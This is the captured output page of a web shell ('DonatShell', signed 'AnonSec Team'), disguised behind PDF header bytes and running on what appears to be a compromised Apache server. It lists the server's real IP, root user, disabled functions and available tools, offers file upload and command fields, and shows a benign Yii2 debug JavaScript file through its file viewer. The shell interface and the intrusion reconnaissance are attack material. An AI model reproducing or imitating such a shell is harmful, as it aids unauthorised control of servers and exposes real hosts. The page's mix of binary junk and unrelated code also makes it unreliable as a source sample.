%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 49.231.201.246  /  Your IP : 216.73.216.149
Web Server : Apache/2.4.18 (Ubuntu)
System : Linux 246 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
User : root ( 0)
PHP Version : 7.0.33-0ubuntu0.16.04.16
Disable Function : exec,passthru,shell_exec,system,proc_open,popen,pcntl_exec
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/11584/cwd/html/ppaobm/vendor/yiisoft/yii2-debug/src/assets/js/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /proc/11584/cwd/html/ppaobm/vendor/yiisoft/yii2-debug/src/assets/js/db.js
(function () {
    'use strict';

    var on = function (element, event, handler) {
            if (element instanceof NodeList) {
                element.forEach(function (value) {
                    value.addEventListener(event, handler, false);
                });
                return;
            }
            if (!(element instanceof Array)) {
                element = [element];
            }
            for (var i in element) {
                if (typeof element[i].addEventListener !== 'function') {
                    continue;
                }
                element[i].addEventListener(event, handler, false);
            }
        },
        ajax = function (url, settings) {
            var xhr = window.XMLHttpRequest ? new XMLHttpRequest() : new ActiveXObject('Microsoft.XMLHTTP');
            settings = settings || {};
            xhr.open(settings.method || 'GET', url, true);
            xhr.setRequestHeader('X-Requested-With', 'XMLHttpRequest');
            xhr.setRequestHeader('Accept', 'text/html');
            xhr.onreadystatechange = function () {
                if (xhr.readyState === 4) {
                    if (xhr.status === 200 && settings.success) {
                        settings.success(xhr);
                    } else if (xhr.status !== 200 && settings.error) {
                        settings.error(xhr);
                    }
                }
            };
            xhr.send(settings.data || '');
        };

    on(document.querySelectorAll('.db-explain a'), 'click', function (e) {
        if (e.target.tagName.toLowerCase() !== 'a') {
            return;
        }

        e.preventDefault();

        var $explain = e.target.parentElement.parentElement.querySelector('.db-explain-text'),
            self = this;

        // hidden (see https://developer.mozilla.org/en-US/docs/Web/API/HTMLElement/offsetParent)
        if ($explain.offsetParent === null) {
            ajax(this.href, {
                success: function (xhr) {
                    $explain.innerHTML = xhr.responseText;
                    $explain.style.display = 'block';
                    self.textContent = '[-] Explain';
                }
            })
        } else {
            $explain.style.display = 'none';
            this.textContent = '[+] Explain';
        }
    });

    on(document.getElementById('db-explain-all').querySelector('a'), 'click', function () {
        var event = new MouseEvent('click', {
            cancelable: true,
            bubbles: true
        });

        document.querySelectorAll('.db-explain a').forEach(function (item) {
            item.dispatchEvent(event);
        });
    });
})();

Anon7 - 2022
AnonSec Team